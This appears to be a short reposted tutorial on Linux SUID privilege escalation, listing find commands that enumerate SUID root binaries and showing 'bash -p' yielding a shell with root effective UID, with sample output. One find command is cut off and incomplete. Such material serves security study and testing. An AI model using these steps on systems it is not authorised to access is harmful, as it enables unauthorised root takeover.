Home >Operation and Maintenance >Linux Operation and Maintenance >How to use SUID to escalate privileges under Linux

How to use SUID to escalate privileges under Linux

WBOY
WBOYforward
2023-05-23 23:52:051806browse

SUID is a permission mechanism in Linux. When a file with this permission is executed, the caller will temporarily obtain the permissions of the owner of the file. If you have SUID permissions, you can use binaries and tools in the system to perform root privilege escalation.

The following command can discover all SUID executable files running on the system. Specifically, the command will try to find files with a SUID that has root permissions.

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls

How to use SUID to escalate privileges under Linux


How to use SUID to escalate privileges under Linux

All the above binaries will be executed with root user rights because of their permissions Contains "s" and corresponds to root permissions.

Bash

The following command will open a bash shell with root privileges.

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

How to use SUID to escalate privileges under Linux

The above is the detailed content of How to use SUID to escalate privileges under Linux. For more information, please follow other related articles on the PHP Chinese website!

Statement:
This article is reproduced at:yisu.com. If there is any infringement, please contact admin@php.cn delete